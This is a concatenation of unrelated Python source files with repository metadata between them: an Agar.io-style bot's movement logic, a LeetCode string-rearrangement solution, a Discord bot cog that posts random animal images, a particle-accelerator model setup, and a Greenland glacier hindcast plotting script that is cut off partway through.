if cell.cellType == 1 or cell.cellType == 3: # food and ejected mass as visible_food
visible_food.append(cell)
elif cell.cellType == 0:
if cell.owner is not self and not self.gameServer.gameMode.haveTeams:
has_enemy = True
elif self.gameServer.gameMode.haveTeams and cell.owner.team != self.team:
has_enemy = True
elif cell.cellType ==2:
visible_virus.append(cell)
if not has_enemy and self.np_random.rand() < 0.05:
action[2] = 0
if visible_food and self.cells:
mincell = self.mincell()
maxcell = self.maxcell()
if len(self.cells) >= 14 and self.maxradius > self.gameServer.config.virusMinRadius * 1.15 and visible_virus:
target = sorted(visible_virus, key=lambda c: (abs(c.position.x - maxcell.position.x) + abs(c.position.y - maxcell.position.y)) / c.mass + 10000 * (self.maxradius <= c.radius * 1.15))[0] # 吃最大cell 1.15倍以下的最近最大virus(when i have >= 14 cells)
relative_position = target.position.clone().sub(maxcell.position)
action[2] = 2
elif len(self.cells) >= 4 and self.maxradius > self.gameServer.config.virusMinRadius * 1.15 and visible_virus and not has_enemy:
target = sorted(visible_virus, key=lambda c: (abs(c.position.x - maxcell.position.x) + abs(c.position.y - maxcell.position.y)) / c.mass + 10000 * (self.maxradius <= c.radius * 1.15))[0]
relative_position = target.position.clone().sub(maxcell.position) # no enemy then also eat virus
action[2] = 2
else:
target = sorted(visible_food, key=lambda c: (abs(c.position.x - mincell.position.x) + abs(c.position.y - mincell.position.y)) / c.mass)[0]
# target = sorted(visible_food, key=lambda c: (abs(c.position.x - self.centerPos.x) + abs(c.position.y - self.centerPos.y)) / c.mass)[0]
relative_position = target.position.clone().sub(mincell.position) # eat food
action[0] = relative_position.x / max(abs(relative_position.x), abs(relative_position.y))
action[1] = relative_position.y / max(abs(relative_position.x), abs(relative_position.y))
self.actionstamp[:2] = action[:2]
elif self.cells:
action[:2] = np.random.randint(2, size=(2)) * 2 - 1
self.actionstamp[:2] = action[:2]
self.action = action
def dfs(self, cell, d_list, deep, pos, opt):
n_p_list = []
b = 2 * np.pi * self.np_random.rand()
b = 0
for j in range(10):
theta = b + 2 * np.pi / 10 * j
next_pos = pos + np.array([np.cos(theta), np.sin(theta)]) * cell.getMoveR()
next_pos = self.gameServer.limit_pos(next_pos)
mi = 1e10
ok = True
for c in d_list:
dis = Vec2(c.position.x - next_pos[0], c.position.y - next_pos[1]).sqDist() - c.getMoveR() * (deep + 1) - c.radius
mi = min(mi, dis)
if dis + (cell.getMoveR() - c.getMoveR()) * (2 - deep) < opt[0]:
ok = False
break
if mi > 0 and ok:
n_p_list.append([next_pos, mi])
if len(n_p_list) == 0:
if deep == 0: #'cannot escape in dfs Bot'
return -1, [0., 0.]
return -1
n_p_list = sorted(n_p_list, key=lambda x: -x[1])
if deep == 2:
opt[0] = max(opt[0], n_p_list[0][1])
return n_p_list[0][1]
ma = -1
ans = [0., 0.]
for x in n_p_list:
old_opt = opt[0]
result = self.dfs(cell, d_list, deep + 1, x[0], opt)
ma = max(ma, result)
if deep == 0:
if old_opt != opt[0]:
ans = x[0] - pos
if deep == 0:
return ma, ans
return ma
def aggressive_step(self):
cell = self.maxcell()
result = Vec2(0, 0) # For splitting
action = np.zeros(3)
action[2] = 2. # now all agents try to keep their size
ab_x = cell.position.x / (self.config.borderWidth - cell.radius) + 0.5
ab_y = cell.position.y / (self.config.borderHeight - cell.radius) + 0.5
gamma = 1.03
danger = False
very_danger = False
danger_list = []
for check in self.viewNodes:
if check.cellType == 0 and check.radius > cell.radius * 1.15:
danger = True
dis = Vec2(check.position.x - cell.position.x, check.position.y - cell.position.y).sqDist()
if dis <= self.config.borderWidth / 6.5 and check.pID < self.gameServer.env.num_agents:
very_danger = True
danger_list.append(check)
if very_danger:
ma, ans = self.dfs(cell, danger_list, 0, np.array([cell.position.x, cell.position.y]), [-1])
result.x = ans[0]
result.y = ans[1]
self.action = np.zeros(3)
self.action[2] = 2
self.action[0] = result.x
self.action[1] = result.y
return
if danger:
self.viewNodes.append(Cell(self.gameServer, None, Vec2(-gamma * self.config.borderWidth / 2, -gamma * self.config.borderHeight / 2), cell.radius))
self.viewNodes.append(Cell(self.gameServer, None, Vec2( gamma * self.config.borderWidth / 2, -gamma * self.config.borderHeight / 2), cell.radius))
self.viewNodes.append(Cell(self.gameServer, None, Vec2(-gamma * self.config.borderWidth / 2, gamma * self.config.borderHeight / 2), cell.radius))
self.viewNodes.append(Cell(self.gameServer, None, Vec2( gamma * self.config.borderWidth / 2, gamma * self.config.borderHeight / 2), cell.radius))
for check in self.viewNodes:
if check.owner == self:
continue
# Get attraction of the cells - avoid larger cells, viruses and same team cells
influence = 0
if check.cellType == -1:
if check.owner is None: # corner
influence = -check.radius
elif check.cellType == 0: # Player cell
if self.gameServer.gameMode.haveTeams and cell.owner.team == check.owner.team:
# Same team cell
influence = 0
elif cell.radius > check.radius * 1.15:
# Can eat it
influence = check.radius * 2.5
elif check.radius > cell.radius * 1.15:
# Can eat me
influence = -check.radius
else:
influence = -(check.radius / cell.radius) / 3
elif check.cellType == 1:
# Food
influence = 1
elif check.cellType == 2:
# Virus/Mothercell
if cell.radius > check.radius * 1.15:
# Can eat it
if len(self.cells) == self.gameServer.config.playerMaxCells:
# Won't explode
influence = check.radius * 2.5
elif len(self.cells) >= self.gameServer.config.playerMaxCells - 6:
influence = check.radius * 2
else:
# Can explode
influence = -1
elif check.isMotherCell and check.radius > cell.radius * 1.15:
# can eat me
influence = -1
elif check.cellType == 3:
# Ejected mass
if cell.radius > check.radius * 1.15:
influence = check.radius
# Apply influence if it isn't 0
if influence == 0:
continue
displacement = Vec2(check.position.x - cell.position.x, check.position.y - cell.position.y)
# Figure out distance between cells
distance = displacement.sqDist()
if distance == 0:
print('bug in Bot', check.owner, self)
continue
if influence < 0:
# Get edge distance
distance -= cell.radius + check.radius
# The farther they are the smaller influnce it is
if distance < 1:
distance = 1; # Avoid NaN and positive influence with negative distance & attraction
influence /= distance
# Splitting conditions
if check.cellType == 0:
checkmax = check.owner.maxcell()
selfmin = self.mincell()
if checkmax and cell.radius / 1.414 > checkmax.radius * 1.15 and selfmin.radius > checkmax.radius and not self.splitCooldown and 820 - cell.radius / 2 - checkmax.radius >= distance:
# Splitkill the target
self.splitCooldown = 10
relative = checkmax.position.clone().sub(cell.position)
if relative.sqDist():
relative = relative.normalize()
action[0] = relative.x
action[1] = relative.y
action[2] = 0
self.action = action
return
else:
result.add(displacement.normalize(), influence)
else:
# Produce force vector exerted by self entity on the cell
result.add(displacement.normalize(), influence)
if danger:
self.viewNodes = self.viewNodes[:-4]
ab_x = cell.position.x / (self.config.borderWidth - cell.radius) + 0.5
ab_y = cell.position.y / (self.config.borderHeight - cell.radius) + 0.5
def sigmoid(x):
x -= 5
return 1. / (1. + np.exp(-x))
beta = 3
result.y *= max(1 / (1 - sigmoid(beta / (np.abs(10 * (ab_x - 1)) + 0.03) ** 0.5)), 1 / (1 - sigmoid(beta / (np.abs(10 * (ab_x - 0)) + 0.03) ** 0.5)))
result.x *= max(1 / (1 - sigmoid(beta / (np.abs(10 * (ab_y - 1)) + 0.03) ** 0.5)), 1 / (1 - sigmoid(beta / (np.abs(10 * (ab_y - 0)) + 0.03) ** 0.5)))
alpha = 0.1
result.add(Vec2(-1, 0), alpha * 1 / (np.abs(10 * (ab_x - 1)) + 0.01) ** 0.5)
result.add(Vec2(+1, 0), alpha * 1 / (np.abs(10 * (ab_x - 0)) + 0.01) ** 0.5)
result.add(Vec2(0, -1), alpha * 1 / (np.abs(10 * (ab_y - 1)) + 0.01) ** 0.5)
result.add(Vec2(0, +1), alpha * 1 / (np.abs(10 * (ab_y - 0)) + 0.01) ** 0.5)
if result.sqDist():
result = result.normalize()
action[0] = result.x
action[1] = result.y
self.action = action
| 43.764912
| 254
| 0.527058
|
794e3213d81b1f731ddf09e9f069f40a4f8a76b8
| 1,214
|
py
|
Python
|
leetcode/358.py
|
windniw/just-for-fun
|
54e5c2be145f3848811bfd127f6a89545e921570
|
[
"Apache-2.0"
] | 1
|
2019-08-28T23:15:25.000Z
|
2019-08-28T23:15:25.000Z
|
leetcode/358.py
|
windniw/just-for-fun
|
54e5c2be145f3848811bfd127f6a89545e921570
|
[
"Apache-2.0"
] | null | null | null |
leetcode/358.py
|
windniw/just-for-fun
|
54e5c2be145f3848811bfd127f6a89545e921570
|
[
"Apache-2.0"
] | null | null | null |
"""
link: https://leetcode-cn.com/problems/rearrange-string-k-distance-apart
problem: 重新排列字符串s,问新组成的字符串s'能否满足每个相同字符间至少间隔k-1个元素
solution: 贪心。依次决定s'的每位新字符是什么,放置时优先挑选当前可以放置的(与其之前的相同字符间隔已经有k)且剩余量最大的。
用堆与队列来实现,先按重复次数入大根堆,每次抛出堆顶元素,放置后将字符入队,当队内元素已经超过k时,证明队首元素可以重新被放置,
取出重新入堆。
"""
class Solution:
def rearrangeString(self, s: str, k: int) -> str:
class item:
def __init__(self, c, n):
self.n = n
self.c = c
def __lt__(self, t):
return self.n > t.n
def __str__(self):
return "c : {}, n: {}".format(self.c, self.n)
def __repr__(self):
return "c : {}, n: {}".format(self.c, self.n)
m, res = collections.Counter(s), ""
heap, queue = [], collections.deque()
for c in m:
heapq.heappush(heap, item(c, m[c]))
while heap:
t = heapq.heappop(heap)
res += t.c
t.n -= 1
queue.append(t)
if len(queue) >= k:
t = queue.popleft()
if t.n > 0:
heapq.heappush(heap, t)
return res if len(res) == len(s) else ""
| 28.904762
| 74
| 0.504119
|
794e325d45c8960c851170436427f2508231d1c3
| 10,700
|
py
|
Python
|
randimages/randimages.py
|
fixator10/predacogs
|
575ede3bbda867222cec911debf8fa306918be22
|
[
"MIT"
] | 38
|
2019-05-13T19:42:31.000Z
|
2022-02-28T10:09:30.000Z
|
randimages/randimages.py
|
fixator10/predacogs
|
575ede3bbda867222cec911debf8fa306918be22
|
[
"MIT"
] | 39
|
2019-05-26T01:55:26.000Z
|
2022-01-28T15:53:29.000Z
|
randimages/randimages.py
|
fixator10/predacogs
|
575ede3bbda867222cec911debf8fa306918be22
|
[
"MIT"
] | 50
|
2019-03-27T15:59:36.000Z
|
2022-03-12T09:33:56.000Z
|
from redbot.core import checks, commands
from redbot.core.i18n import Translator, cog_i18n
from .core import Core
from . import constants as sub
_ = Translator("Image", __file__)
@cog_i18n(_)
class RandImages(Core):
"""Send random images (animals, art ...) from different APIs."""
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def art(self, ctx: commands.Context):
"""Send art from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("art image"), emoji="\N{ARTIST PALETTE}", sub=sub.ART, details=True
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def birb(self, ctx: commands.Context):
"""Send a random birb image from alexflipnote API."""
await self._send_other_msg(
ctx,
name=_("birb"),
emoji="\N{BIRD}",
source="alexflipnote API",
img_url="https://api.alexflipnote.dev/birb",
img_arg="file",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["cats"])
async def cat(self, ctx: commands.Context):
"""Send a random cat image some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("cat"),
emoji="\N{CAT FACE}",
source="nekos.life",
img_url="https://nekos.life/api/v2/img/meow",
img_arg="url",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["catsfact"])
async def catfact(self, ctx: commands.Context):
"""Send a random cat fact with a random cat image from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("a cat fact with a random cat image"),
emoji="\N{CAT FACE}",
source="nekos.life",
img_url="https://nekos.life/api/v2/img/meow",
img_arg="url",
facts_url="https://some-random-api.ml/facts/cat",
facts_arg="fact",
facts=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def coffee(self, ctx: commands.Context):
"""Send a random coffee image from alexflipnote API."""
await self._send_other_msg(
ctx,
name=_("your coffee"),
emoji="\N{HOT BEVERAGE}",
source="alexflipnote API",
img_url="https://coffee.alexflipnote.dev/random.json",
img_arg="file",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["cuteness"])
async def cute(self, ctx: commands.Context):
"""Send a random cute images from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("a cute image"), emoji="❤️", sub=sub.CUTE, details=False
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["dogs"])
async def dog(self, ctx: commands.Context):
"""Send a random dog image from random.dog API."""
await self._send_other_msg(
ctx,
name=_("dog"),
emoji="\N{DOG FACE}",
source="random.dog",
img_url="https://random.dog/woof.json",
img_arg="url",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["dogsfact"])
async def dogfact(self, ctx: commands.Context):
"""Send a random dog fact with a random dog image from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("a dog fact with a random dog image"),
emoji="\N{DOG FACE}",
source="random.dog",
img_url="https://random.dog/woof.json",
img_arg="url",
facts_url="https://some-random-api.ml/facts/dog",
facts_arg="fact",
facts=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def duck(self, ctx: commands.Context):
"""Send a random duck image from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("a duck image"), emoji="\N{DUCK}", sub=sub.DUCKS, details=False
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["ferrets"])
async def ferret(self, ctx: commands.Context):
"""Send a random ferrets images from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("a ferret image"), emoji="❤️", sub=sub.FERRETS, details=False
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["foxes"])
async def fox(self, ctx: commands.Context):
"""Send a random fox image from randomfox.ca API"""
await self._send_other_msg(
ctx,
name=_("fox"),
emoji="\N{FOX FACE}",
source="randomfox.ca",
img_url="https://randomfox.ca/floof",
img_arg="image",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["pandas"])
async def panda(self, ctx: commands.Context):
"""Send a random panda image from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("panda"),
emoji="\N{PANDA FACE}",
source="some-random-api.ml",
img_url="https://some-random-api.ml/img/panda",
img_arg="link",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def lizard(self, ctx: commands.Context):
"""Send a random lizard image from nekos.life API"""
await self._send_other_msg(
ctx,
name=_("lizard"),
emoji="\N{LIZARD}",
source="nekos.life",
img_url="https://nekos.life/api/lizard",
img_arg="url",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["memes"])
async def meme(self, ctx: commands.Context):
"""Send a random dank meme from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("meme image"), emoji="\N{OK HAND SIGN}", sub=sub.MEMES, details=False
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["pandasfact"])
async def pandafact(self, ctx: commands.Context):
"""Send a random panda fact with a random panda image from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("a panda fact with a random panda image"),
emoji="\N{PANDA FACE}",
source="some-random-api.ml",
img_url="https://some-random-api.ml/img/panda",
img_arg="link",
facts_url="https://some-random-api.ml/facts/panda",
facts_arg="fact",
facts=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["pikachu"])
async def pika(self, ctx: commands.Context):
"""Send a random Pikachu image or GIF from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("Pikachu"),
emoji="❤️",
source="some-random-api.ml",
img_url="https://some-random-api.ml/img/pikachu",
img_arg="link",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def shiba(self, ctx: commands.Context):
"""Send a random shiba image from shiba.online API."""
await self._send_other_msg(
ctx,
name=_("shiba"),
emoji="\N{DOG FACE}",
source="shibe.online",
img_url="http://shibe.online/api/shibes",
img_arg=0,
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["photography"])
async def photo(self, ctx: commands.Context):
"""Send a random photography from random subreddits."""
await self._send_reddit_msg(
ctx,
name=_("a photography"),
emoji="\N{CAMERA WITH FLASH}",
sub=sub.PHOTOS,
details=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["subr"])
@commands.max_concurrency(1, commands.BucketType.user, wait=False)
async def subreddit(self, ctx: commands.Context, *, subreddit: str):
"""Send a random image from a chosen subreddit."""
if subreddit in ["friends", "mod"]:
return await ctx.send("This isn't a valid subreddit.")
await self._send_reddit_msg(
ctx,
name=_("random image"),
emoji="\N{FRAME WITH PICTURE}",
sub=[str(subreddit)],
details=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["wallp"])
async def wallpaper(self, ctx: commands.Context):
"""Send a random wallpaper image from random subreddits."""
await self._send_reddit_msg(
ctx,
name=_("a wallpaper"),
emoji="\N{FRAME WITH PICTURE}",
sub=sub.WALLPAPERS,
details=True,
)
| 34.85342
| 93
| 0.596355
|
794e3379e6ea77ac30a4e79890fff2a6d7949c45
| 663
|
py
|
Python
|
pymodels/TS_V04_01/accelerator.py
|
lnls-fac/models
|
b806c3bcca6a8a8e02c1a3c9abee92f7366c44cb
|
[
"MIT"
] | 3
|
2015-04-13T23:20:31.000Z
|
2015-04-14T01:50:31.000Z
|
pymodels/TS_V04_01/accelerator.py
|
lnls-fac/models
|
b806c3bcca6a8a8e02c1a3c9abee92f7366c44cb
|
[
"MIT"
] | 17
|
2015-04-14T01:50:21.000Z
|
2016-01-28T12:50:27.000Z
|
pymodels/TS_V04_01/accelerator.py
|
lnls-fac/sirius
|
b806c3bcca6a8a8e02c1a3c9abee92f7366c44cb
|
[
"MIT"
] | 1
|
2022-02-08T13:11:35.000Z
|
2022-02-08T13:11:35.000Z
|
import numpy as _np
import lnls as _lnls
import pyaccel as _pyaccel
from . import lattice as _lattice
default_radiation_on = False
default_vchamber_on = False
def create_accelerator(optics_mode=_lattice.default_optics_mode):
latt, twiss_at_start = _lattice.create_lattice(optics_mode=optics_mode)
accelerator = _pyaccel.accelerator.Accelerator(
lattice= latt,
energy=_lattice.energy,
radiation_on=default_radiation_on,
vchamber_on=default_vchamber_on
)
return accelerator, twiss_at_start
accelerator_data = dict()
accelerator_data['lattice_version'] = 'TS_V04_01'
accelerator_data['pressure_profile'] = None
| 25.5
| 75
| 0.775264
|
794e34f6cd26f82dd76c136ef9fae57635c9201b
| 14,999
|
py
|
Python
|
Visualization/Gld-case_study_plotting.py
|
achau1/plastic-networks
|
6845a7d83ab9d6901dfc921e5fe7ffda965758da
|
[
"MIT"
] | null | null | null |
Visualization/Gld-case_study_plotting.py
|
achau1/plastic-networks
|
6845a7d83ab9d6901dfc921e5fe7ffda965758da
|
[
"MIT"
] | null | null | null |
Visualization/Gld-case_study_plotting.py
|
achau1/plastic-networks
|
6845a7d83ab9d6901dfc921e5fe7ffda965758da
|
[
"MIT"
] | null | null | null |
## Plotting individual glacier results for case studies
## 24 Apr 2019 EHU
import numpy as np
import matplotlib.pyplot as plt
import csv
import shapefile
#import collections
import glob
#from matplotlib.colors import LogNorm
from matplotlib import cm
import matplotlib.patches as mpatches
from shapely.geometry import *
from scipy import interpolate
from scipy.ndimage import gaussian_filter
## Special import for SERMeQ modules
import sys
sys.path.insert(0, 'Documents/GitHub/plastic-networks')
from SERMeQ.plastic_utilities_v2 import *
from SERMeQ.GL_model_tools import *
from SERMeQ.flowline_class_hierarchy import *
### Topography needed to remove floating points from saved coords
###
print 'Reading in surface topography'
gl_bed_path ='Documents/1. Research/2. Flowline networks/Model/Data/BedMachine-Greenland/BedMachineGreenland-2017-09-20.nc'
fh = Dataset(gl_bed_path, mode='r')
xx = fh.variables['x'][:].copy() #x-coord (polar stereo (70, 45))
yy = fh.variables['y'][:].copy() #y-coord
s_raw = fh.variables['surface'][:].copy() #surface elevation
h_raw=fh.variables['thickness'][:].copy() # Gridded thickness
b_raw = fh.variables['bed'][:].copy() # bed topo
thick_mask = fh.variables['mask'][:].copy()
ss = np.ma.masked_where(thick_mask !=2, s_raw)#mask values: 0=ocean, 1=ice-free land, 2=grounded ice, 3=floating ice, 4=non-Greenland land
hh = np.ma.masked_where(thick_mask !=2, h_raw)
#bb = np.ma.masked_where(thick_mask !=2, b_raw)
bb = b_raw #don't mask, to allow bed sampling from modern bathymetry (was subglacial in ~2006)
## Down-sampling
X = xx[::2]
Y = yy[::2]
S = ss[::2, ::2]
H = hh[::2, ::2]
B = bb[::2, ::2]
M = thick_mask[::2,::2]
## Not down-sampling
#X = xx
#Y = yy
#S = ss
fh.close()
#Smoothing bed and surface
unsmoothB = B
smoothB = gaussian_filter(B, 2)
smoothS = gaussian_filter(S, 2)
#B_processed = np.ma.masked_where(thick_mask !=2, smoothB)
#Replacing interpolated surface with bed+thickness
S_new = np.add(B, H)
S_interp = interpolate.RectBivariateSpline(X, Y[::-1], smoothS.T[::, ::-1])
H_interp = interpolate.RectBivariateSpline(X, Y[::-1], H.T[::, ::-1])
B_interp = interpolate.RectBivariateSpline(X, Y[::-1], smoothB.T[::, ::-1])
###--------------------------------------
#### GLACIERS TO PLOT
###--------------------------------------
## Which glaciers are available
glacier_ids = range(1,195) #MEaSUREs glacier IDs to process.
not_present = (93, 94, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 169) #glacier IDs missing from set
## which ones get special treatment
added_jan19 = (139, 140, 141, 142, 143, 159, 161, 172, 173, 177)
seaward_projected = (61, 64, 82, 83, 99, 130, 132, 139, 140, 141, 156, 157, 158, 161, 167, 170, 178, 179, 180, 184)
special_treatment = np.concatenate((added_jan19, seaward_projected))
errors = (5, 18, 19, 29, 71, 92, 95, 97, 101, 107, 108, 120, 134) #glacier IDs that crashed in hindcasting 12 Mar 2019
rmv = np.concatenate((not_present, errors))
for n in rmv:
try:
glacier_ids.remove(n)
except ValueError:
pass
#glaciers_to_plot=np.copy(glacier_ids).tolist()
#for m in special_treatment:
# try:
# glaciers_to_plot.remove(m)
# except ValueError:
# pass
glaciers_to_plot = [g for g in glacier_ids if g in (3, 105, 137, 175)]
testyears = arange(0, 9, step=0.25)#array of the years tested, with year "0" reflecting initial nominal date of MEaSUREs read-in (generally 2006)
scenarios = ('persistence',)
#datemarker = '2019-02-08' #markers on filename to indicate date run
tempmarker = 'min10Cice' #and temperature of ice
timestepmarker = '8a_dt025a' #and total time and timestep
full_output_dicts = {}
for s in scenarios:
scenario_output = {'Testyears': testyears}
for gid in glaciers_to_plot:
fn = glob.glob('Documents/GitHub/Data_unsynced/Hindcasted_networks/GID{}-*-{}-{}-{}.pickle'.format(gid, s, tempmarker, timestepmarker))[0] #using glob * to select files of multiple run dates
lightload(fn, glacier_name = 'GID{}'.format(gid), output_dictionary = scenario_output)
#for i, gid in enumerate(glaciers_to_plot):
# fn = 'GID{}-{}-{}-{}-{}.pickle'.format(gid, datemarker, s, tempmarker, timestepmarker)
# lightload(fn, glacier_name = 'GID{}'.format(gid), output_dictionary = scenario_output)
full_output_dicts[s] = scenario_output #add output from this scenario to the dictionary of all output, with scenario name as key
perscenario_fluxes = []
perscenario_SLE = []
for s in full_output_dicts.keys():
print 'Scenario {}'.format(s)
out = full_output_dicts[s]
pernetwork_cumul_fx = []
pernetwork_cumul_sle = []
for j, gid in enumerate(glaciers_to_plot):
branch_fx = [np.nan_to_num(out['GID{}'.format(gid)][k]['Terminus_flux']) for k in range(len(out['GID{}'.format(gid)]))]
total_fx = sum(branch_fx, axis=0)
total_sle = (1E-12)*np.array(total_fx)/(361.8) #Gt ice/mm SLE conversion
cumul_fx = np.cumsum(total_fx)
cumul_sle = np.cumsum(total_sle)
pernetwork_cumul_fx.append(cumul_fx)
pernetwork_cumul_sle.append(cumul_sle)
scenario_flux = np.cumsum(pernetwork_cumul_fx, axis=0)
perscenario_fluxes.append(scenario_flux[-1])
scenario_sle = np.cumsum(pernetwork_cumul_sle, axis=0)
print max(scenario_sle[-1])
print(scenario_sle[-1][-1])
perscenario_SLE.append(scenario_sle[-1])
gl_termpos_fldr = 'Documents/GitHub/Data_unsynced/MEaSUREs-termini'
basefiles = ['/termini_0607_v01_2', '/termini_0708_v01_2', '/termini_0809_v01_2', '/termini_1213_v01_2', '/termini_1415_v01_2', '/termini_1516_v01_2']
obs_years = [2006, 2007, 2008, 2012, 2014, 2015] #compare with term of hindcast, 2006-2014
termini = {}
for i,b in enumerate(basefiles):
yr = obs_years[i]
fn = gl_termpos_fldr+b
termini[yr] = read_termini(fn, yr) #creating dictionary for each year
print len(termini[yr])
nw_base_fpath = 'Documents/1. Research/2. Flowline networks/Auto_selected-networks/Gld-autonetwork-GID'
projected_termini = {gid: [] for gid in glaciers_to_plot}
seaward_coords_fpath = 'Documents/GitHub/Data_unsynced/Auto_selected-networks/Seaward_coords/Gld-advnetwork-GID'
termpos_corrections = {gid: 0 for gid in glacier_ids}
for gid in glaciers_to_plot:
print 'Reading in glacier ID: '+str(gid)
#if gid in added_jan19:
# filename = nw_base_fpath+str(gid)+'-date_2019-01-10.csv'
filename = glob.glob(nw_base_fpath+'{}-date_*.csv'.format(gid))[0] #using glob * to select files of different run dates
coords_list = Flowline_CSV(filename, has_width=True, flip_order=False)
if gid in seaward_projected:
seaward_fn = seaward_coords_fpath+'{}-fwd_2000_m.csv'.format(gid)
seaward_coords = Flowline_CSV(seaward_fn, has_width=True, flip_order=True)[0]
branch_0 = Branch(coords=np.concatenate((seaward_coords, coords_list[0])), index=0, order=0) #saving extended central branch as main
termpos_correction = 10*max(ArcArray(seaward_coords)) #how much glacier length has been added to initial line, i.e. how much terminus shifted in coordinate system, in km
print termpos_correction
else:
branch_0 = Branch(coords=coords_list[0], index=0, order=0) #saving central branch as main
termpos_correction = 0
termpos_corrections[gid] = termpos_correction
branch_list = [branch_0]
nw = PlasticNetwork(name='GID'+str(gid), init_type='Branch', branches=branch_list, main_terminus=branch_0.coords[0])
nw.make_full_lines()
if gid not in seaward_projected: #remove floating, but not from lines that have been artificially extended
print 'Removing floating points from glacier ID: '+str(gid)
nw.process_full_lines(B_interp, S_interp, H_interp)
nw.remove_floating()
mainline = LineString(nw.flowlines[0].coords)
for yr in obs_years:
try:
termpts = termini[yr][gid] #get terminus points for each year
t = projected_term_obs(termpts, mainline) #project onto main flowline
r = retterm(termpts, mainline) #find most retreated point
a = advterm(termpts, mainline) #find most advanced point
print 'GID {}, t={}, r={}, a={}'.format(gid, t, r, a)
projected_termini[gid].append((-1*termpos_correction)+np.asarray((a, t, r))) #add these to dictionary of projected termini per glacier
except KeyError:
print 'No terminus found in year {} for GID {}.'.format(yr, gid)
projected_termini[gid].append((0, np.nan, 0))
###--------------------------------------
#### PLOTTING
###--------------------------------------
## Settings for plots
#labels = [str(g[1]) for g in gids_by_name if g[0] in glaciers_to_plot] #set what the glaciers will be called in plotting. Default is simply their MEaSUREs ID
labels = [str(g) for g in glaciers_to_plot]
markers = ['o', '.', ',', '^', 'd', '*']
styles = ['-', ':', '-.', '-', '-', '-']
cmap = cm.get_cmap('winter')
scenario_colors = cm.get_cmap('Blues')([0.1, 0.3, 0.5, 0.7, 0.9])
#colors = cmap([0.1, 0.2, 0.3, 0.5, 0.7, 0.9])
colors = cmap(linspace(0.1, 0.9, num=len(glaciers_to_plot)))
alt_colors = cm.get_cmap('Greys')([0.2, 0.3, 0.5, 0.7, 0.9])
plot_years = 2006+np.array(testyears)
#
#####terminus
#plt.figure()
#for j, gid in enumerate(glaciers_to_plot):
# print gid
# term_positions = full_output_dicts['persistence']['GID{}'.format(gid)][0]['Termini'][1::]
# ms_selection = mod(j, len(styles))
# plt.plot(testyears, -0.001*np.array(term_positions), linewidth=2, color='Gainsboro', linestyle=styles[ms_selection], label=labels[j])
# #plt.plot(testyears[::4], -0.001*np.array(full_output_dicts['persistence']['GID{}'.format(gid)][0]['Termini'][1::])[::4], linewidth=0, marker=markers[ms_selection], ms=10, color=colors[j])
#plt.legend(loc='lower left')
#plt.axes().set_xlabel('Year of simulation', size=20)
#plt.axes().set_ylabel('Terminus change [km]', size=20)
#plt.axes().tick_params(axis='both', length=5, width=2, labelsize=20)
##plt.axes().set_ylim(-100, 1)
##plt.axes().set_yticks([-75, -50, -25, 0])
#plt.title('Terminus retreat of {} Greenland outlet glaciers 2006-2014 ERA-I, Tice=-10 C'.format(len(glaciers_to_plot)), fontsize=20)
#plt.show()
####SINGLE NETWORK - termini vs obs
for j, gid in enumerate(glaciers_to_plot):
sim_termini = full_output_dicts['persistence']['GID{}'.format(gid)][0]['Termini'][1::]
obs_termini = np.asarray(projected_termini[gid]) #will be of shape (len(obs_years), 3) with an entry (lower, centroid, upper) for each year
obs_term_centr = obs_termini[:,1]
e = np.asarray([(min(ot[0]-ot[1], ot[0]), ot[1]-ot[2]) for ot in obs_termini]).T #error lower (more advanced), upper (less advanced)
